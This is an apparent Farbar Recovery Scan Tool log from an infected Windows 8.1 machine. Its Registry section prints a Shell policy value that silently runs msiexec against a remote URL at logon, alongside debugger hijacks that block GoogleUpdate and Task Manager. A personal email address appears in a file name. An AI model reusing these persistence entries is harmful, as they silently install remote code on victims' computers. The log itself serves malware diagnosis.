Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 20-05-2017 Ran by Oli (administrator) on OLIWIA (22-05-2017 17:22:10) Running from C:\Users\Oli\Downloads Loaded Profiles: Oli (Available Profiles: Oli) Platform: Windows 8.1 (Update) (X64) Language: English (United States) Internet Explorer Version 11 (Default browser: "C:\Program Files (x86)\Firefox\Firefox.exe" -osint -url "%1") Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (ESET) C:\Program Files\ESET\ESET Security\ekrn.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe (Filseclab Corporation Limited) C:\Program Files (x86)\ScreenShot\SSSvc.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe (ESET) C:\Program Files\ESET\ESET Security\egui.exe (Intel Corporation) C:\Windows\System32\igfxtray.exe (Intel Corporation) C:\Windows\System32\igfxsrvc.exe (Intel Corporation) C:\Windows\System32\hkcmd.exe (Intel Corporation) C:\Windows\System32\igfxpers.exe (Microsoft Corporation) C:\Windows\System32\StikyNot.exe (ALLPlayer Group Ltd.) C:\Program Files (x86)\ALLPlayer Remote\ALLPlayerRemoteControl.exe (Spotify Ltd) C:\Users\Oli\AppData\Roaming\Spotify\SpotifyWebHelper.exe (Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe ==================== Registry (Whitelisted) ==================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM-x32\...\Run: [IseUI] => C:\Program Files (x86)\COMODO\Internet Security Essentials\vkise.exe HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation) Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation) HKU\S-1-5-21-2083115291-1334581206-888238541-1001\...\Run: [RESTART_STICKY_NOTES] => C:\Windows\System32\StikyNot.exe [479744 2014-10-29] (Microsoft Corporation) HKU\S-1-5-21-2083115291-1334581206-888238541-1001\...\Run: [Spotify Web Helper] => C:\Users\Oli\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1449584 2017-05-22] (Spotify Ltd) HKU\S-1-5-21-2083115291-1334581206-888238541-1001\...\Run: [Spotify] => C:\Users\Oli\AppData\Roaming\Spotify\Spotify.exe [6997104 2017-05-22] (Spotify Ltd) HKU\S-1-5-21-2083115291-1334581206-888238541-1001\...\Run: [ALLUpdate] => C:\Program Files (x86)\ALLPlayer\ALLUpdate.exe [3670472 2015-07-28] (ALLPlayer Group Ltd.) HKU\S-1-5-21-2083115291-1334581206-888238541-1001\...\Run: [Napisy24Update] => "C:\Program Files (x86)\Napisy24\Napisy24Update.exe" "sleep" HKU\S-1-5-21-2083115291-1334581206-888238541-1001\...\Run: [ALLPlayer WiFi Remote] => C:\Program Files (x86)\ALLPlayer Remote\ALLPlayerRemoteControl.exe [6168768 2016-09-15] (ALLPlayer Group Ltd.) HKU\S-1-5-21-2083115291-1334581206-888238541-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8cFjzLOTVWOUZXMjHxMYUcNWM8NjH5MWk8NdRXRUQWOF== /q AppInit_DLLs: C:\WINDOWS\system32\nvinitx.dll => C:\WINDOWS\system32\nvinitx.dll [181280 2017-01-25] (NVIDIA Corporation) AppInit_DLLs-x32: C:\WINDOWS\SysWOW64\nvinit.dll => C:\WINDOWS\SysWOW64\nvinit.dll [158392 2017-01-25] (NVIDIA Corporation) IFEO\DisplaySwitch.exe: [Debugger] IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe IFEO\taskmgr.exe: [Debugger] ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 Tcpip\..\Interfaces\{83E9D82E-80F2-4AE1-8F6E-B5907E69F380}: [DhcpNameServer] 192.168.1.1 Internet Explorer: ================== BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation) FireFox: ======== FF DefaultProfile: m03wbirn.default FF ProfilePath: C:\Users\Oli\AppData\Roaming\Mozilla\Firefox\Profiles\m03wbirn.default [2017-05-11] FF user.js: detected! => C:\Users\Oli\AppData\Roaming\Mozilla\Firefox\Profiles\m03wbirn.default\user.js [2017-05-11] FF Homepage: Mozilla\Firefox\Profiles\m03wbirn.default -> hxxp://www.luckysearch123.com?type=hp&ts=1494523248&from=c8350511&uid=toshibaxmq01abd050_23o5flvbsxx23o5flvbs&z=31bbad4a0d8b03ce67d2bbegaz6tez6wao1c0ocz6q FF NewTab: Mozilla\Firefox\Profiles\m03wbirn.default -> hxxp://www.luckysearch123.com?type=hp&ts=1494523248&from=c8350511&uid=toshibaxmq01abd050_23o5flvbsxx23o5flvbs&z=31bbad4a0d8b03ce67d2bbegaz6tez6wao1c0ocz6q FF Extension: (Browser-Security) - C:\Users\Oli\AppData\Roaming\Mozilla\Firefox\Profiles\m03wbirn.default\Extensions\firefox@browser-security.de.xpi [2017-02-22] FF Extension: (Adblock Plus) - C:\Users\Oli\AppData\Roaming\Mozilla\Firefox\Profiles\m03wbirn.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2017-02-19] FF Extension: (No Name) - C:\Users\Oli\AppData\Roaming\Mozilla\Firefox\Profiles\m03wbirn.default\extensions\arthurj8283@gmail.com [not found] FF SearchPlugin: C:\Users\Oli\AppData\Roaming\Mozilla\Firefox\Profiles\m03wbirn.default\searchplugins\luck.xml [2017-05-11] FF ProfilePath: C:\Users\Oli\AppData\Roaming\Firefox\Firefox\Profiles\m03wbirn.default [2017-05-12] FF user.js: detected! => C:\Users\Oli\AppData\Roaming\Firefox\Firefox\Profiles\m03wbirn.default\user.js [2017-02-22] FF Homepage: Firefox\Firefox\Profiles\m03wbirn.default -> www.google.pl FF Extension: (SimilarWeb) - C:\Users\Oli\AppData\Roaming\Firefox\Firefox\Profiles\m03wbirn.default\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi [2017-05-11] [not signed] FF Extension: (HSearch) - C:\Users\Oli\AppData\Roaming\Firefox\Firefox\Profiles\m03wbirn.default\Extensions\@E97YHOMI-FU8L-IM23-VUT9-RVDZT7M8XL8H.xpi [2017-05-11] [not signed] FF Extension: (FF Adr) - C:\Users\Oli\AppData\Roaming\Firefox\Firefox\Profiles\m03wbirn.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-05-11] [not signed] FF Extension: (Browser-Security) - C:\Users\Oli\AppData\Roaming\Firefox\Firefox\Profiles\m03wbirn.default\Extensions\firefox@browser-security.de.xpi [2017-02-22] FF Extension: (Adblock Plus) - C:\Users\Oli\AppData\Roaming\Firefox\Firefox\Profiles\m03wbirn.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2017-02-19] FF SearchPlugin: C:\Users\Oli\AppData\Roaming\Firefox\Firefox\Profiles\m03wbirn.default\searchplugins\startsearch.xml [2017-05-11] FF HKLM-x32\...\Firefox\Extensions: [arthurj8283@gmail.com] - C:\Users\Oli\AppData\Roaming\Mozilla\Firefox\Profiles\m03wbirn.default\extensions\arthurj8283@gmail.com => not found ==================== Services (Whitelisted) ==================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R2 ekrn; C:\Program Files\ESET\ESET Security\ekrn.exe [2624856 2017-03-09] (ESET) S2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [131024 2016-12-02] (Elex do Brasil Participações Ltda) R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [458176 2016-12-29] (NVIDIA Corporation) R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited) S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [361824 2017-01-12] (Microsoft Corporation) S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [119872 2017-01-12] (Microsoft Corporation) S2 OneDirveSrv; C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll [X] ===================== Drivers (Whitelisted) ====================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R1 eamonm; C:\WINDOWS\System32\DRIVERS\eamonm.sys [132848 2017-03-09] (ESET) S0 eelam; C:\WINDOWS\System32\DRIVERS\eelam.sys [14880 2017-03-09] (ESET) R1 ehdrv; C:\WINDOWS\system32\DRIVERS\ehdrv.sys [178056 2017-03-09] (ESET) R1 epfwwfpr; C:\WINDOWS\system32\DRIVERS\epfwwfpr.sys [77224 2017-03-09] (ESET) R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION S3 iSafeKrnlBoot; C:\WINDOWS\System32\DRIVERS\iSafeKrnlBoot.sys [55056 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION R1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION R0 sptd; C:\WINDOWS\System32\Drivers\sptd.sys [394296 2017-05-12] (Duplex Secure Ltd.) S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [46600 2017-02-10] (Microsoft Corporation) S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [274776 2017-01-12] (Microsoft Corporation) S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [117592 2017-01-12] (Microsoft Corporation) ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One Month Created files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2017-05-22 17:22 - 2017-05-22 17:22 - 00009865 _____ C:\Users\Oli\Downloads\FRST.txt 2017-05-22 17:21 - 2017-05-22 17:21 - 02429952 _____ (Farbar) C:\Users\Oli\Downloads\FRST64.exe 2017-05-12 18:42 - 2017-05-12 18:42 - 00394296 _____ (Duplex Secure Ltd.) C:\WINDOWS\system32\Drivers\sptd.sys 2017-05-12 18:41 - 2017-05-12 18:41 - 00593952 _____ (Duplex Secure Ltd) C:\Users\Oli\Downloads\Unconfirmed 885591.crdownload 2017-05-12 18:41 - 2017-05-12 18:41 - 00593952 _____ (Duplex Secure Ltd) C:\Users\Oli\Downloads\SPTDinst-v189-x64 (1).exe 2017-05-12 18:31 - 2017-05-22 17:22 - 00000000 ____D C:\FRST 2017-05-11 23:15 - 2017-05-12 17:54 - 00000000 ____D C:\Users\Oli\AppData\LocalLow\Mozilla 2017-05-11 23:14 - 2017-05-11 23:14 - 00000000 ____D C:\Users\Oli\AppData\Local\VirtualStore 2017-05-11 22:49 - 2017-05-11 22:49 - 00000000 ____D C:\WINDOWS\CbsTemp 2017-05-11 21:58 - 2017-05-11 21:58 - 00000000 ____D C:\Users\Oli\AppData\Local\ESET 2017-05-11 21:54 - 2017-05-11 21:54 - 00000000 ____D C:\Program Files\ESET 2017-05-11 21:38 - 2017-05-11 21:38 - 03139200 _____ (ESET) C:\Users\Oli\Downloads\eset_nod32_antivirus_live_installer.exe 2017-05-11 21:32 - 2017-05-12 18:03 - 00000000 ____D C:\Users\Oli\AppData\Local\Google 2017-05-11 21:32 - 2017-05-11 21:32 - 00000000 ____D C:\Users\Oli\AppData\Local\Bagsarah 2017-05-11 19:25 - 2017-05-11 19:25 - 00000000 _____ C:\WINDOWS\SysWOW64\33 2017-05-11 19:18 - 2017-05-11 19:18 - 00002106 _____ C:\Users\Public\Desktop\Google Chrome.lnk 2017-05-11 19:18 - 2017-05-11 19:18 - 00000000 ____D C:\Users\Oli\AppData\Local\Firefox 2017-05-11 19:17 - 2017-05-11 19:17 - 00000000 ____D C:\Users\Oli\AppData\Roaming\Firefox 2017-05-11 19:17 - 2017-05-11 19:17 - 00000000 _____ C:\WINDOWS\SysWOW64\3333333 2017-05-11 19:16 - 2017-05-11 19:17 - 00002055 _____ C:\Users\Oli\Desktop\big_bang_empire.lnk 2017-05-11 19:16 - 2017-05-11 19:16 - 00002029 _____ C:\Users\Oli\Desktop\BigFarm.lnk 2017-05-11 19:16 - 2017-05-11 19:16 - 00000000 ____D C:\WINDOWS\system32\log 2017-05-11 19:16 - 2017-05-11 19:16 - 00000000 ____D C:\Users\Oli\AppData\Roaming\Elex-tech 2017-05-11 19:16 - 2017-05-11 19:16 - 00000000 ____D C:\Program Files (x86)\Elex-tech 2017-05-11 19:16 - 2017-05-11 19:16 - 00000000 _____ C:\WINDOWS\SysWOW64\1111 2017-05-11 19:16 - 2016-05-23 04:41 - 00055056 _____ (Elex do Brasil Participações Ltda) C:\WINDOWS\system32\Drivers\iSafeKrnlBoot.sys 2017-05-11 19:15 - 2017-05-12 18:47 - 00000000 _____ C:\Users\Public\Documents\temp.dat 2017-05-11 19:15 - 2017-05-11 22:04 - 00000000 ____D C:\Program Files (x86)\Firefox 2017-05-11 19:15 - 2017-05-11 21:20 - 00000000 _____ C:\Users\Public\Documents\report.dat 2017-05-11 19:15 - 2017-05-11 19:15 - 00000000 ____D C:\Users\Public\Documents\Google 2017-05-11 19:15 - 2017-05-11 19:15 - 00000000 ____D C:\Program Files (x86)\Bagsarah 2017-05-11 19:15 - 2017-05-11 19:15 - 00000000 _____ C:\WINDOWS\SysWOW64\1111111 2017-05-11 19:15 - 2017-05-11 19:15 - 00000000 _____ C:\WINDOWS\SysWOW64\11 2017-05-11 19:15 - 2017-05-11 19:15 - 00000000 _____ C:\WINDOWS\SysWOW64\00 2017-05-10 18:19 - 2017-03-30 15:15 - 00875712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcr120_clr0400.dll 2017-05-10 18:19 - 2017-03-30 15:15 - 00869568 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcr120_clr0400.dll 2017-05-10 18:19 - 2017-03-30 15:15 - 00678592 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcp120_clr0400.dll 2017-05-10 18:19 - 2017-03-30 15:15 - 00536768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcp120_clr0400.dll 2017-05-10 17:33 - 2017-04-28 23:15 - 07444824 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe 2017-05-10 17:33 - 2017-04-26 16:06 - 04169216 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys 2017-05-10 17:33 - 2017-04-16 12:23 - 02176584 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll 2017-05-10 17:33 - 2017-04-16 12:23 - 01662096 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll 2017-05-10 17:33 - 2017-04-16 12:23 - 01063464 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll 2017-05-10 17:33 - 2017-04-16 12:18 - 01135288 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll 2017-05-10 17:33 - 2017-04-16 12:18 - 00803192 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll 2017-05-10 17:33 - 2017-04-16 11:07 - 01566032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll 2017-05-10 17:33 - 2017-04-16 11:07 - 01213792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll 2017-05-10 17:33 - 2017-04-16 11:07 - 00548032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll 2017-05-10 17:33 - 2017-04-16 11:05 - 00612096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll 2017-05-10 17:33 - 2017-04-16 10:54 - 00576512 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll 2017-05-10 17:33 - 2017-04-16 10:54 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll 2017-05-10 17:33 - 2017-04-16 10:51 - 02899456 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll 2017-05-10 17:33 - 2017-04-16 10:37 - 00116224 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieetwcollector.exe 2017-05-10 17:33 - 2017-04-16 10:36 - 00817664 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll 2017-05-10 17:33 - 2017-04-16 10:35 - 25741312 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll 2017-05-10 17:33 - 2017-04-16 10:18 - 05977600 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll 2017-05-10 17:33 - 2017-04-16 10:16 - 00862720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll 2017-05-10 17:33 - 2017-04-16 10:10 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx 2017-05-10 17:33 - 2017-04-16 10:03 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll 2017-05-10 17:33 - 2017-04-16 10:02 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll 2017-05-10 17:33 - 2017-04-16 10:01 - 00499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll 2017-05-10 17:33 - 2017-04-16 10:00 - 00315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll 2017-05-10 17:33 - 2017-04-16 10:00 - 00064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll 2017-05-10 17:33 - 2017-04-16 09:53 - 02290176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll 2017-05-10 17:33 - 2017-04-16 09:52 - 01033216 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll 2017-05-10 17:33 - 2017-04-16 09:49 - 20278272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll 2017-05-10 17:33 - 2017-04-16 09:47 - 00663552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll 2017-05-10 17:33 - 2017-04-16 09:43 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll 2017-05-10 17:33 - 2017-04-16 09:40 - 00806912 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll 2017-05-10 17:33 - 2017-04-16 09:40 - 00725504 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe 2017-05-10 17:33 - 2017-04-16 09:40 - 00378880 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll 2017-05-10 17:33 - 2017-04-16 09:37 - 02132992 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl 2017-05-10 17:33 - 2017-04-16 09:29 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx 2017-05-10 17:33 - 2017-04-16 09:24 - 00076288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll 2017-05-10 17:33 - 2017-04-16 09:23 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll 2017-05-10 17:33 - 2017-04-16 09:22 - 00817664 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll 2017-05-10 17:33 - 2017-04-16 09:22 - 00279040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll 2017-05-10 17:33 - 2017-04-16 09:17 - 00880640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll 2017-05-10 17:33 - 2017-04-16 09:12 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll 2017-05-10 17:33 - 2017-04-16 09:10 - 15250944 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll 2017-05-10 17:33 - 2017-04-16 09:10 - 00693248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll 2017-05-10 17:33 - 2017-04-16 09:10 - 00330752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll 2017-05-10 17:33 - 2017-04-16 09:08 - 04548608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll 2017-05-10 17:33 - 2017-04-16 09:08 - 02057216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl 2017-05-10 17:33 - 2017-04-16 09:04 - 03241472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll 2017-05-10 17:33 - 2017-04-16 09:02 - 00267776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincorlib.dll 2017-05-10 17:33 - 2017-04-16 08:53 - 13661184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll 2017-05-10 17:33 - 2017-04-16 08:50 - 01544704 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll 2017-05-10 17:33 - 2017-04-16 08:40 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll 2017-05-10 17:33 - 2017-04-16 08:37 - 02767872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll 2017-05-10 17:33 - 2017-04-16 08:34 - 01314816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll 2017-05-10 17:33 - 2017-04-16 08:34 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll 2017-05-10 17:33 - 2017-04-10 00:00 - 01548640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys 2017-05-10 17:33 - 2017-04-10 00:00 - 00388448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys 2017-05-10 17:33 - 2017-04-08 01:20 - 01375960 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll 2017-05-10 17:33 - 2017-04-07 15:56 - 01094656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll 2017-05-10 17:33 - 2017-04-02 18:41 - 00684544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys 2017-05-10 17:33 - 2017-04-02 18:41 - 00414720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys 2017-05-10 17:33 - 2017-04-01 01:16 - 01968408 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll 2017-05-10 17:33 - 2017-03-31 23:59 - 01612504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll 2017-05-10 17:33 - 2017-03-13 18:38 - 00206848 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmitomi.dll 2017-05-10 17:33 - 2017-03-13 18:29 - 02609664 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmSvc.dll 2017-05-10 17:33 - 2017-03-13 18:25 - 00285184 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmWmiPl.dll 2017-05-10 17:33 - 2017-03-13 18:13 - 00159232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmitomi.dll 2017-05-10 17:33 - 2017-03-13 18:07 - 02170880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmSvc.dll 2017-05-10 17:33 - 2017-03-13 18:06 - 00236032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmWmiPl.dll 2017-05-10 17:33 - 2017-03-11 21:34 - 00201728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys 2017-05-10 17:33 - 2017-03-11 21:32 - 00401408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys 2017-05-10 17:33 - 2017-03-11 21:32 - 00285184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys 2017-05-10 17:33 - 2017-03-11 20:49 - 00445440 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll 2017-05-10 17:33 - 2017-03-11 19:58 - 01437696 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll 2017-05-10 17:33 - 2017-03-11 19:54 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll 2017-05-10 17:33 - 2017-03-11 01:38 - 02017624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys 2017-05-10 17:33 - 2017-03-11 01:38 - 00275800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msiscsi.sys 2017-05-10 17:33 - 2017-03-09 22:52 - 00293376 _____ (Microsoft Corporation) C:\WINDOWS\system32\wisp.dll 2017-05-10 17:33 - 2017-03-09 21:17 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wisp.dll 2017-05-10 17:33 - 2017-03-08 04:44 - 00448285 _____ C:\WINDOWS\system32\ApnDatabase.xml 2017-05-07 20:49 - 2017-05-07 20:49 - 00013016 _____ C:\Users\Oli\Downloads\Intouchables 2011.srt 2017-05-07 11:00 - 2017-05-07 11:00 - 01861011 _____ C:\Users\Oli\Desktop\Wyniki wyszukiwania - olivia.ostrowska@gmail.com - Gmail.htm 2017-05-07 11:00 - 2017-05-07 11:00 - 00000000 ____D C:\Users\Oli\Desktop\Wyniki wyszukiwania - olivia.ostrowska@gmail.com - Gmail_pliki 2017-05-03 14:30 - 2017-05-05 07:33 - 00000000 ____D C:\Users\Oli\Desktop\j.polski 2017-04-22 17:27 - 2017-04-22 17:27 - 00186115 _____ C:\Users\Oli\Downloads\Praca-nr-1-A.-Dobrzyniecka-21.04.2017-PDF.pdf 2017-04-22 13:43 - 2017-04-22 13:43 - 00025890 _____ C:\Users\Oli\Desktop\Zeszyt1.xlsx ==================== One Month Modified files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2017-05-22 17:11 - 2017-02-23 16:14 - 00000000 ____D C:\Users\Oli\AppData\Local\Spotify 2017-05-22 17:11 - 2017-02-23 16:13 - 00000000 ____D C:\Users\Oli\AppData\Roaming\Spotify 2017-05-18 17:13 - 2013-08-22 16:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT 2017-05-12 19:42 - 2013-08-22 15:36 - 00000000 ____D C:\WINDOWS\Inf 2017-05-11 23:15 - 2017-02-19 03:34 - 00000000 ____D C:\Users\Oli\AppData\Roaming\Mozilla 2017-05-11 22:49 - 2017-02-19 04:55 - 00000000 ____D C:\WINDOWS\system32\MRT 2017-05-11 22:47 - 2017-02-19 04:55 - 156335152 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2017-05-11 22:40 - 2017-02-19 03:28 - 00003598 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2083115291-1334581206-888238541-1001 2017-05-11 22:06 - 2017-02-22 19:27 - 00000000 ____D C:\Users\Oli\AppData\Roaming\Browser-Security 2017-05-11 22:04 - 2017-04-01 12:35 - 00000000 ____D C:\KMPlayer 2017-05-11 22:04 - 2017-03-04 14:08 - 00000000 ____D C:\Users\Oli\Desktop\Zdjęcia 2017-05-11 22:04 - 2017-02-20 22:10 - 00000000 ____D C:\Users\Oli\Desktop\Syria 2017-05-11 22:04 - 2017-02-19 04:31 - 00000000 ___HD C:\$SysReset 2017-05-11 22:04 - 2017-02-19 03:34 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service 2017-05-11 22:04 - 2017-02-19 03:13 - 00000000 ____D C:\WINDOWS\Panther 2017-05-11 22:04 - 2016-02-27 23:59 - 00000000 ____D C:\Users\Oli\Desktop\Syria- 3 rozdział 2017-05-11 22:04 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\SysWOW64\setup 2017-05-11 22:04 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI 2017-05-11 22:04 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\SysWOW64\Com 2017-05-11 22:04 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\security 2017-05-11 22:04 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\Registration 2017-05-11 22:04 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\InputMethod 2017-05-11 22:04 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\Help 2017-05-11 22:04 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\FileManager 2017-05-11 22:04 - 2013-08-22 17:36 - 00000000 ____D C:\Program Files\Common Files\microsoft shared 2017-05-11 22:04 - 2013-08-22 16:44 - 00511880 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2017-05-11 22:02 - 2013-08-22 15:25 - 00262144 ___SH C:\WINDOWS\system32\config\BBI 2017-05-11 21:59 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\PolicyDefinitions 2017-05-11 21:58 